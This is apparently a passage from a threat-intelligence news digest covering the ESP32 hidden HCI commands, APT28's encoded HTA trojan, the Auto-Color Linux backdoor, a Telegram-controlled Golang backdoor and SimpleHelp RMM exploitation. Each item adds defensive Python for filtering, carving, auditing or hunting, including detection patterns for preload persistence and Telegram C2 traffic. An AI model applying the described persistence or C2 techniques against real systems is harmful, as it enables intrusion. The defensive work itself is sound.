  • aboutdfir.com: InfoSec News Nuggets 3/17/2025 discusses a state-backed group from China targeting Juniper Networks routers with custom backdoors.
  • ASEC: A report on the deep web and dark web from February 2025 notes the espionage group UNC3886 operating out of China targeting routers made by Juniper Networks.

Veronika Telychko@SOC Prime Blog //
A set of undocumented vendor-specific commands, widely reported as a "backdoor," has been discovered in the ESP32 microchip made by the Chinese manufacturer Espressif. The chip is a cornerstone of the Internet of Things (IoT) ecosystem, providing Bluetooth and Wi-Fi connectivity, and was used in over a billion devices as of 2023. The commands, since tracked as CVE-2025-27840, could be leveraged for attacks including spoofing trusted devices, manipulating the chip's memory, and pivoting to other devices on the network.

This discovery was made by Spanish researchers Miguel Tarascó Acuña and Antonio Vázquez Blanco of Tarlogic Security, who presented their findings at RootedCON. The commands are vendor-specific HCI commands handled by the chip's Bluetooth controller, so issuing them requires something that already talks to the controller: firmware running on the ESP32 itself, a compromised host, or physical access. Espressif and some commentators therefore describe them as a hidden feature rather than a remotely exploitable backdoor, while others point out that they still give an attacker with any foothold low-level protocol injection and a way to persist in flash. Either way, given the chip's widespread use, the potential impact is extensive, and the finding raises concerns about the security of the many devices and systems that rely on the ESP32. The research underscores the need for robust security measures in IoT devices.
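
As an added example (not Tarlogic's or Espressif's code), the following parses HCI command packets on an H4 host-to-controller link, splits each opcode into its OGF and OCF, and drops vendor-specific commands (OGF 0x3F) unless they are explicitly allowlisted. That is the policy a host stack, or a serial proxy placed in front of the chip, can enforce against undocumented commands. The sample packets and the allowlist are constructed; the ESP32's own opcodes are not reproduced here.

```python
"""Allowlist filter for vendor-specific HCI commands on an H4 link (added example).

Sample packets and the allowlist are constructed for illustration; the real opcodes found
in the ESP32 controller firmware are not reproduced here.
"""
import struct

H4_COMMAND = 0x01          # H4 packet indicator for HCI command packets
OGF_VENDOR = 0x3F          # Opcode Group Field reserved for vendor-specific commands


def parse_hci_command(pkt: bytes) -> dict:
    """Split an H4 command packet into opcode, OGF, OCF and parameter bytes."""
    if len(pkt) < 4 or pkt[0] != H4_COMMAND:
        raise ValueError("not an H4 HCI command packet")
    opcode, plen = struct.unpack_from("<HB", pkt, 1)     # opcode is little-endian, then parameter length
    params = pkt[4:4 + plen]
    if len(params) != plen:
        raise ValueError("truncated parameters")
    return {"opcode": opcode, "ogf": opcode >> 10, "ocf": opcode & 0x3FF, "params": params}


def build_hci_command(ogf: int, ocf: int, params: bytes = b"") -> bytes:
    """Assemble an H4 command packet from its OGF/OCF and parameters."""
    return bytes([H4_COMMAND]) + struct.pack("<HB", (ogf << 10) | ocf, len(params)) + params


def filter_commands(packets, vendor_allowlist=frozenset()):
    """Return (forwarded, dropped); dropped holds vendor commands whose OCF is not allowlisted."""
    forwarded, dropped = [], []
    for pkt in packets:
        cmd = parse_hci_command(pkt)
        if cmd["ogf"] == OGF_VENDOR and cmd["ocf"] not in vendor_allowlist:
            dropped.append(cmd)
        else:
            forwarded.append(cmd)
    return forwarded, dropped


# Constructed sample stream: two standard commands and two vendor commands, one of them permitted.
SAMPLE_PACKETS = [
    build_hci_command(0x03, 0x0003),                       # HCI_Reset (opcode 0x0C03)
    build_hci_command(0x04, 0x0001),                       # HCI_Read_Local_Version_Information (0x1001)
    build_hci_command(OGF_VENDOR, 0x0001, b"\x01"),        # vendor command on the allowlist (constructed OCF)
    build_hci_command(OGF_VENDOR, 0x0123, struct.pack("<IH", 0x00001000, 16)),  # unknown vendor command (constructed)
]
VENDOR_ALLOWLIST = frozenset({0x0001})

if __name__ == "__main__":
    fwd, drop = filter_commands(SAMPLE_PACKETS, VENDOR_ALLOWLIST)
    print("forwarded:", [hex(c["opcode"]) for c in fwd])
    print("dropped:", [hex(c["opcode"]) for c in drop])
```

With an empty allowlist every vendor command is dropped, which is the safe default for a product that only needs the standard command set; allowlist the specific OCFs the firmware legitimately uses rather than the whole group, and fuzz those.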

Recommended read:
References :
  • infosec.exchange: Ok, poll for the "supply chain risk management" people! There's a backdoor in the ESP32 wifi/bluetooth chip.
  • The DefendOps Diaries: Discover the ESP32 backdoor's impact on IoT security and the urgent need for robust protection measures.
  • www.bleepingcomputer.com: The ubiquitous ESP32 microchip made by Chinese manufacturer Espressif and used by over 1 billion units as of 2023 contains an undocumented "backdoor" that could be leveraged for attacks.
  • BleepingComputer: Infosec.Exchange post about ESP32 Microchip Backdoor
  • Jon Greig: IOC.Exchange post about the backdoor
  • TARNKAPPE.INFO: Bluetooth-Chip-Backdoor entdeckt: Über 1 Mrd. Geräte betroffen
  • Rescana: Unveiling the ESP32 Bluetooth Chip Backdoor: Security Vulnerabilities and Mitigation Strategies
  • BleepingComputer: The ubiquitous ESP32 microchip made by Chinese manufacturer Espressif and used by over 1 billion units as of 2023 contains undocumented commands that could be leveraged for attacks.
  • dragosr: Oh, is that all? A few (billion?) ESP32 devices let attackers establish persistency in local flash using an undocumented commands set accessible from an over the air pivot, and low level protocol injection and spoofing control...
  • securityaffairs.com: Undocumented hidden feature found in Espressif ESP32 microchip
  • Davey Winder: Identity Theft Warning—Hidden Commands In 1 Billion Bluetooth Chips
  • www.techradar.com: Top Bluetooth chip security flaw could put a billion devices at risk worldwide
  • Security | TechRepublic: Researchers warn these commands could be exploited to manipulate memory, impersonate devices, and bypass security controls.
  • BetaNews: Attackers can use undocumented commands to hijack Chinese-made Bluetooth chips
  • CyberInsider: Hidden Commands Discovered in Bluetooth Chip Used in a Billion Devices
  • bsky.app: Undocumented "backdoor" found in Bluetooth chip used by a billion devices
  • Matthew Rosenquist: The recent undocumented code in the ESP32 microchip, made by Chinese manufacturer Espressif Systems, is used in over 1 billion devices and could represent a cybersecurity risk.
  • SOC Prime Blog: CVE-2025-27840: Vulnerability Exploitation in Espressif ESP32 Bluetooth Chips Can Lead to Unauthorized Access to Devices

@Talkback Resources //
Cybersecurity researchers have detailed the obfuscation tactics that APT28, a Russian state-sponsored threat actor, uses in an HTA trojan deployed in espionage campaigns concerning Central Asia and Kazakhstan's diplomatic relations. The analysis reveals multi-layer obfuscation designed to evade detection, with Microsoft's VBE format at the core of the delivery mechanism. VBE (VBScript Encoded) is produced by the Windows Script Encoder, screnc.exe, which transforms VBScript and JScript into an encoded form that the script host still executes but that hides the script's true content from casual inspection.

The investigation found that the HTA's encoded script is decoded at run time by Windows' vbscript.dll, so the original strings exist in memory only while the script executes. By tracing those strings and the memory addresses they interact with, the researchers were able to recover the original VBScript hidden inside the HTA; the same result can be obtained statically with publicly available tools such as vbe-decoder.py, which exposed the final payload used for espionage. This discovery underscores the need for robust malware analysis capabilities and proactive threat-intelligence sharing within the cybersecurity community.
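
As an added example not taken from the analysis, here is the carving step that precedes decoding: locating encoded script blocks in an HTA (a language attribute of VBScript.Encode or JScript.Encode, or the `#@~^` ... `^#~@` framing), separating the six-character length and checksum fields the encoder places on either side, and undoing the five escape sequences it uses for characters it cannot emit inside a script body. The decoding table itself lives in tools such as vbe-decoder.py and is not reproduced here; the sample HTA is constructed and its encoded body is placeholder text in the right framing, not a real encoded script.

```python
"""Locate and carve Script Encoder (VBE/JSE) blocks from an HTA (added example, not from the analysis).

The sample HTA is constructed; its encoded body is placeholder text in the right framing, not a
real encoded script, and the decode table is left to tools such as vbe-decoder.py.
"""
import re

SCRIPT_BLOCK = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
LANGUAGE_ATTR = re.compile(r"language\s*=\s*[\"']?([\w.]+)", re.I)
# framing: '#@~^' + 6-char length field + '==' + encoded body + 6-char checksum field + '==^#~@'
ENCODED_FRAME = re.compile(r"#@~\^(.{6})==(.*?)(.{6})==\^#~@", re.S)
ESCAPES = {"@&": "\n", "@#": "\r", "@*": ">", "@!": "<", "@$": "@"}


def unescape(body: str) -> str:
    """Reverse the encoder's escapes for characters it must not emit inside HTML/script bodies."""
    return re.sub(r"@[&#*!$]", lambda m: ESCAPES[m.group(0)], body)


def find_encoded_scripts(hta: str) -> list:
    """One dict per encoded script block: language, framing fields, and the carved body."""
    found = []
    for attrs, content in SCRIPT_BLOCK.findall(hta):
        lang_match = LANGUAGE_ATTR.search(attrs)
        language = lang_match.group(1) if lang_match else ""
        frame = ENCODED_FRAME.search(content)
        if frame is None and not language.lower().endswith(".encode"):
            continue   # plain script block, nothing to carve
        entry = {"language": language, "framed": frame is not None}
        if frame:
            entry["length_field"] = frame.group(1)
            entry["checksum_field"] = frame.group(3)
            entry["body"] = unescape(frame.group(2))   # hand this to the decoder
        else:
            entry["body"] = content.strip()             # declared encoded but unframed: inspect by hand
        found.append(entry)
    return found


# Constructed sample: one plain script and one encoded block whose body is placeholder text.
SAMPLE_HTA = """<html><head><title>Doc</title>
<script language="VBScript">MsgBox "hello"</script>
<script language="VBScript.Encode">#@~^AAAAAA==r+j@!XmtKW@*@&~@$hC@#AAAAAA==^#~@</script>
</head><body></body></html>"""

if __name__ == "__main__":
    for entry in find_encoded_scripts(SAMPLE_HTA):
        print(entry)
```

The carved body is what the decoders consume; a block whose language attribute says VBScript.Encode but carries no framing, or whose length field disagrees with the body, is either damaged or another layer of obfuscation and worth a closer look.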

Recommended read:
References :
  • Virus Bulletin: Cisco Talos researcher Joey Chen describes how Lotus Blossom uses Sagerunex and other hacking tools for post-compromise activities. The espionage operation targets government, manufacturing, telecommunications & media organizations from Philippines, Vietnam, Hong Kong & Taiwan.
  • gbhackers.com: Lotus Blossom Hacker Group Uses Dropbox, Twitter, and Zimbra for C2 Communications
  • Talkback Resources: Lotus Blossom espionage group targets multiple industries with different versions of Sagerunex and hacking tools
  • www.cysecurity.news: Cisco Talos Uncovers Lotus Blossom’s Multi-Campaign Cyber Espionage Operations
  • Cyber Security News: Researchers Unveil APT28’s Advanced HTA Trojan Obfuscation Tactics in Detail
  • gbhackers.com: Researchers Unveil APT28’s Advanced HTA Trojan Obfuscation Tactics
  • securityaffairs.com: Chinese Lotus Blossom APT targets multiple sectors with Sagerunex backdoor

Field Effect@Blog //
A new Linux malware strain, dubbed Auto-Color, has been identified by Palo Alto Networks' Unit 42 targeting universities and government organizations across North America and Asia. This previously undocumented backdoor uses stealth tactics to evade detection and maintain persistence on compromised systems. The initial delivery method is currently unknown, but researchers have observed that it is usually executed under unassuming file names such as "door," "egg," or "log."

Once executed with root privileges, Auto-Color copies itself to /var/log/cross/auto-color, installs a malicious library named libcext.so.2 (named to resemble the legitimate libcext.so.0), and adds that library to the dynamic loader's preload list (/etc/ld.so.preload; some write-ups give the path as /etc/ld.preload), so it is loaded into every dynamically linked process that starts afterwards. Without root privileges it skips the preload step. Auto-Color grants attackers full remote access to compromised machines, and because the preloaded library rides inside every process, removal is exceptionally difficult without specialized tools.
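
The persistence mechanism is generic, so the check for it is too. As an added example (not Unit 42's tooling), the script below parses the loader's preload list the way glibc does (whitespace-separated entries, # comments), flags entries by name and by directory against an allowlist you supply, and looks for the paths named above. The constructed sample and its allowlist entry are assumptions; the main block runs the same checks against the live host.

```python
"""Audit /etc/ld.so.preload for Auto-Color-style persistence (added example, not Unit 42 tooling).

The sample preload contents and the allowlist entry are constructed; the implant name and the
on-disk path come from the write-up above.
"""
import os

PRELOAD_FILE = "/etc/ld.so.preload"
STANDARD_LIB_DIRS = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/")
IMPLANT_NAMES = {"libcext.so.2"}                 # the implant; libcext.so.0 is the name it imitates
KNOWN_PATHS = ["/var/log/cross/auto-color"]


def parse_preload(text: str) -> list:
    """glibc reads whitespace-separated paths and ignores anything after '#'."""
    libs = []
    for line in text.splitlines():
        libs.extend(line.split("#", 1)[0].split())
    return libs


def audit_preload(text: str, allowlist=frozenset(), exists=os.path.exists) -> list:
    """Return (path, reasons) for every preload entry that is not explicitly allowed."""
    findings = []
    for lib in parse_preload(text):
        if lib in allowlist:
            continue
        reasons = []
        if os.path.basename(lib) in IMPLANT_NAMES:
            reasons.append("known implant name")
        if not lib.startswith(STANDARD_LIB_DIRS):
            reasons.append("outside standard library directories")
        if not exists(lib):
            reasons.append("listed but missing on disk (or hidden from this process)")
        findings.append((lib, reasons or ["not on allowlist"]))
    return findings


def check_known_paths(exists=os.path.exists) -> list:
    """Paths the write-up associates with the implant that are present on this host."""
    return [p for p in KNOWN_PATHS if exists(p)]


# Constructed sample: one allowed entry, the implant name in a standard directory, a hidden temp library.
SAMPLE_PRELOAD = """\
/usr/lib/x86_64-linux-gnu/libfakeroot/libfakeroot-sysv.so   # maintained by ops
/usr/lib/x86_64-linux-gnu/libcext.so.2
/tmp/.x/libhide.so
"""
SAMPLE_ALLOWLIST = frozenset({"/usr/lib/x86_64-linux-gnu/libfakeroot/libfakeroot-sysv.so"})

if __name__ == "__main__":
    text = open(PRELOAD_FILE).read() if os.path.exists(PRELOAD_FILE) else ""
    for path, reasons in audit_preload(text, SAMPLE_ALLOWLIST):
        print(f"{path}: {', '.join(reasons)}")
    for path in check_known_paths():
        print(f"present: {path}")
```

One caveat follows directly from the mechanism: this script is itself a dynamically linked process, so on an infected host the preloaded library is already inside it and can lie to every libc call it makes. Run the check from a statically linked binary or from a rescue environment when the result matters.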

Recommended read:
References :
  • Blog: Linux Systems Threated by New ‘Auto-Color’ Backdoor
  • Information Security Buzz: ‘Auto-Color’ Linux Malware Uses Advanced Stealth Tactics to Evade Detection
  • The Hacker News: New Linux Malware ‘Auto-Color’ Grants Hackers Full Remote Access to Compromised Systems

info@thehackernews.com (The Hacker News)@The Hacker News //
A new Golang-based backdoor has been discovered that leverages the Telegram Bot API for command-and-control (C2) communications. Cybersecurity researchers at Netskope Threat Labs detailed the malware, suggesting it may be of Russian origin. According to security researcher Leandro Fróes, the malware, while seemingly still under development, is fully functional and acts as a backdoor once executed. The backdoor utilizes an open-source library offering Golang bindings for the Telegram Bot API.

Once launched, the malware checks whether it is running from a specific location under a specific name ("C:\Windows\Temp\svchost.exe"). If not, it copies itself to that path and starts the copy as a new process. The backdoor then interacts with the Telegram Bot API to receive commands from an attacker-controlled chat, supporting commands to execute PowerShell, relaunch itself, and self-destruct. A screenshot command is also present but not yet fully implemented.

Netskope highlights that attackers' use of cloud applications such as Telegram presents a challenge for defenders, because the ease of setup these services offer is available to the attacker during every phase of an intrusion, and the resulting traffic goes to a legitimate, widely used host over HTTPS (the Bot API is served from api.telegram.org), so blocking by destination is rarely practical and detection has to rest on which process is talking and how it behaves. The Russian-language prompt the "/cmd" instruction sends ("Enter the command:" in Russian) further supports the assessment of a Russian origin.
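The two host behaviours the write-up describes, a copy of svchost.exe running from C:\Windows\Temp and a non-sanctioned process polling api.telegram.org, are what a hunt should key on. The code below is an added example for this page, not Netskope's or the backdoor's code. The event records are constructed and shaped loosely on Sysmon process-creation and network-connection telemetry (an assumption about the collector), and the allow-listed alertbot.exe is a hypothetical sanctioned bot integration.

```python
"""Hunt for a masquerading svchost.exe and unsanctioned Telegram Bot API traffic.

Added example, not Netskope's or the malware's code. Event dicts are
constructed; the field names assume a collector such as Sysmon (event IDs 1
and 3) normalised into {type, image, parent | dest_host, dest_port}.
"""
from typing import Dict, List, Optional, Tuple

# The only places a legitimate svchost.exe lives; it is started by services.exe.
LEGIT_SVCHOST = {r"c:\windows\system32\svchost.exe", r"c:\windows\syswow64\svchost.exe"}
BOT_API_HOST = "api.telegram.org"
# Hypothetical sanctioned integration that may use the Bot API (assumption).
ALLOWED_BOT_API_IMAGES = {r"c:\program files\opsbot\alertbot.exe"}

# Constructed telemetry: a real svchost, the backdoor's copy, and three connections.
EVENTS: List[Dict[str, str]] = [
    {"type": "process", "image": r"C:\Windows\System32\svchost.exe",
     "parent": r"C:\Windows\System32\services.exe"},
    {"type": "process", "image": r"C:\Windows\Temp\svchost.exe",
     "parent": r"C:\Users\alice\Downloads\invoice.exe"},
    {"type": "network", "image": r"C:\Windows\Temp\svchost.exe",
     "dest_host": "api.telegram.org", "dest_port": "443"},
    {"type": "network", "image": r"C:\Program Files\OpsBot\alertbot.exe",
     "dest_host": "api.telegram.org", "dest_port": "443"},
    {"type": "network", "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dest_host": "www.example.org", "dest_port": "443"},
]


def check_process(ev: Dict[str, str]) -> Optional[str]:
    """Reason string if a process-creation event looks like a masquerading svchost.exe."""
    image = ev["image"].lower()
    if not image.endswith("\\svchost.exe"):
        return None
    if image not in LEGIT_SVCHOST:
        return "svchost.exe running outside the Windows system directories"
    if not ev.get("parent", "").lower().endswith("\\services.exe"):
        return "svchost.exe not started by services.exe"
    return None


def check_connection(ev: Dict[str, str]) -> Optional[str]:
    """Reason string if a Telegram Bot API connection comes from an unsanctioned process."""
    if ev["dest_host"].lower() != BOT_API_HOST:
        return None
    if ev["image"].lower() in ALLOWED_BOT_API_IMAGES:
        return None
    return "Telegram Bot API connection from a process not on the allow-list"


def hunt(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Apply both checks and return (image, reason) pairs."""
    findings: List[Tuple[str, str]] = []
    for ev in events:
        reason = check_process(ev) if ev["type"] == "process" else check_connection(ev)
        if reason:
            findings.append((ev["image"], reason))
    return findings


if __name__ == "__main__":
    for image, reason in hunt(EVENTS):
        print(f"{reason}: {image}")
```

Against the constructed events only the Temp copy is flagged, twice: once at creation and once when it reaches the Bot API. Matching on the full lower-cased image path rather than on the file name is what makes the first rule robust against a correctly named but misplaced binary, and the allow-list keeps a real bot integration from drowning the second rule in noise.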

Recommended read:
References :
  • ciso2ciso.com: New Golang-Based Backdoor Uses Telegram Bot API for Evasive C2 Operations – Source:thehackernews.com
  • securityaffairs.com: New Golang-based backdoor relies on Telegram for C2 communication
  • Talkback Resources: New Golang-Based Backdoor Uses Telegram Bot API for Evasive C2 Operations [mal]
  • The Hacker News: New Golang-Based Backdoor Uses Telegram Bot API for Evasive C2 Operations
  • hackread.com: Hackers Exploit Telegram API to Spread New Golang Backdoor with Russian Connection
  • Talkback Resources: New Golang-Based Backdoor Uses Telegram Bot API for Evasive C2 Operations
  • securityonline.info: A new Golang-based backdoor, potentially of Russian origin, uses Telegram for C2 communication, exploiting cloud apps for enhanced stealth.
  • Talkback Resources: Talkback.sh article summarizing a new Golang-based backdoor using Telegram Bot API for evasive C2 operations.
  • www.scworld.com: Telegram API exploited by new Golang backdoor
  • Security Risk Advisors: New #Golang backdoor abuses #Telegram Bot API for stealthy remote commands and self-destruct.
  • securityonline.info: Security researchers at Netskope Threat Labs have uncovered a new backdoor malware written in Golang that leverages Telegram
  • Threat Labs - Netskope: 🚩Golang Malware Uses Telegram Bot API for Stealthy Remote Commands and Data Exfiltration
  • www.csoonline.com: Russian malware discovered with Telegram hacks for C2 operations

@www.bleepingcomputer.com //
Hackers are actively exploiting vulnerabilities in SimpleHelp Remote Monitoring and Management (RMM) software to compromise systems and potentially deploy ransomware. Cybersecurity firm Field Effect has confirmed these exploits and released a report detailing the post-exploitation activity. The vulnerabilities, tracked as CVE-2024-57726 (a low-privileged technician account can escalate to administrator), CVE-2024-57727 (unauthenticated path traversal that exposes server files, including configuration containing hashed credentials) and CVE-2024-57728 (arbitrary file upload by an administrator, leading to code execution), chain together to let an attacker create administrator accounts and drop backdoors, laying the groundwork for further malicious activity. SimpleHelp fixed all three in version 5.5.8 (5.4.10 and 5.3.9 for the older branches), so any internet-facing server still below those versions should be treated as exposed.

Field Effect identified a breach in which threat actors exploited these vulnerabilities in the SimpleHelp RMM client to infiltrate a targeted network. Following initial access, the attackers ran discovery commands to gather system and network data. They then established persistence by creating new administrator accounts and deploying Sliver, Bishop Fox's open-source post-exploitation framework, which is gaining popularity as a Cobalt Strike alternative. Once deployed, the Sliver implant waits for further commands, enabling the attackers to compromise the domain controller and potentially distribute malicious software.
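The persistence step in that chain, creating an account and immediately making it an administrator, leaves a characteristic pair of Windows Security events: 4720 (a user account was created) followed within minutes by 4732 (a member was added to a security-enabled local group) for BUILTIN\Administrators. The correlation below is an added example for this page, not Field Effect's code. The records are constructed, the field names assume a log collector that has normalised the event XML into flat keys, and the 15-minute session window and the account names are assumptions.

```python
"""Flag a freshly created local account that is promoted to Administrators.

Added example, not Field Effect's code. Correlates Windows Security event
4720 (account created) with a later 4732 (member added to a security-enabled
local group) whose target group is BUILTIN\\Administrators, within one
operator session. Records are constructed; field names assume a collector
that flattened the event XML.
"""
from datetime import datetime, timedelta
from typing import Dict, List

ADMINISTRATORS_SID = "S-1-5-32-544"      # well-known SID of BUILTIN\Administrators
SESSION_WINDOW = timedelta(minutes=15)   # assumption: creation and elevation in one sitting

# Constructed Security log records, out of order on purpose.
EVENTS: List[Dict[str, str]] = [
    # Intrusion: an account appears at 03:14 and is elevated four seconds later.
    {"ts": "2025-01-22T03:14:09", "id": "4732", "subject": "WS01\\Administrator",
     "group_sid": ADMINISTRATORS_SID, "member": "WS01\\svc_backup"},
    {"ts": "2025-01-22T03:14:05", "id": "4720", "subject": "WS01\\Administrator",
     "target": "svc_backup"},
    # Routine onboarding the day before: a new user joins Users (S-1-5-32-545), not Administrators.
    {"ts": "2025-01-21T09:02:11", "id": "4720", "subject": "CORP\\helpdesk",
     "target": "new_hire"},
    {"ts": "2025-01-21T09:02:40", "id": "4732", "subject": "CORP\\helpdesk",
     "group_sid": "S-1-5-32-545", "member": "WS01\\new_hire"},
]


def _account(name: str) -> str:
    """Normalise 'HOST\\user' or 'user' to a lower-case user name."""
    return name.rsplit("\\", 1)[-1].lower()


def find_new_local_admins(events: List[Dict[str, str]],
                          window: timedelta = SESSION_WINDOW) -> List[Dict[str, object]]:
    """Return one finding per account created and added to Administrators within `window`."""
    created: Dict[str, datetime] = {}
    findings: List[Dict[str, object]] = []
    for ev in sorted(events, key=lambda e: e["ts"]):          # correlate in time order
        ts = datetime.fromisoformat(ev["ts"])
        if ev["id"] == "4720":
            created[_account(ev["target"])] = ts
        elif ev["id"] == "4732" and ev.get("group_sid") == ADMINISTRATORS_SID:
            user = _account(ev["member"])
            created_at = created.get(user)
            if created_at is not None and timedelta(0) <= ts - created_at <= window:
                findings.append({
                    "account": user,
                    "created": created_at.isoformat(),
                    "elevated": ts.isoformat(),
                    "by": ev["subject"],
                    "seconds": int((ts - created_at).total_seconds()),
                })
    return findings


if __name__ == "__main__":
    for f in find_new_local_admins(EVENTS):
        print(f"new local admin {f['account']} created and elevated by {f['by']} "
              f"in {f['seconds']} s ({f['created']} -> {f['elevated']})")
```

Matching on the group SID rather than the localised group name keeps the rule working on non-English systems, and the short window is what separates an operator's create-then-elevate from legitimate provisioning spread over a ticket's lifetime. In the Field Effect case the subject performing both actions would be the session the attacker obtained through the RMM client, which is the next pivot for the investigation.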

Recommended read:
References :
  • Security Risk Advisors: Threat Actors Exploit SimpleHelp RMM Vulnerabilities to Deploy Ransomware
  • The Hacker News: Hackers Exploiting SimpleHelp RMM Flaws for Persistent Access and Ransomware
  • www.bleepingcomputer.com: Hackers are targeting vulnerable SimpleHelp RMM clients to create administrator accounts, drop backdoors, and potentially lay the groundwork for ransomware attacks.
  • Blog: Threat actors exploiting #SimpleHelp RMM #vulnerabilities to deploy #ransomware
  • www.scworld.com: Sliver malware spread via SimpleHelp RMM exploits
  • fieldeffect.com: Threat actors exploiting #SimpleHelp RMM #vulnerabilities to deploy #ransomware
  • gbhackers.com: Hackers Exploiting SimpleHelp Vulnerabilities to Deploy Malware on Systems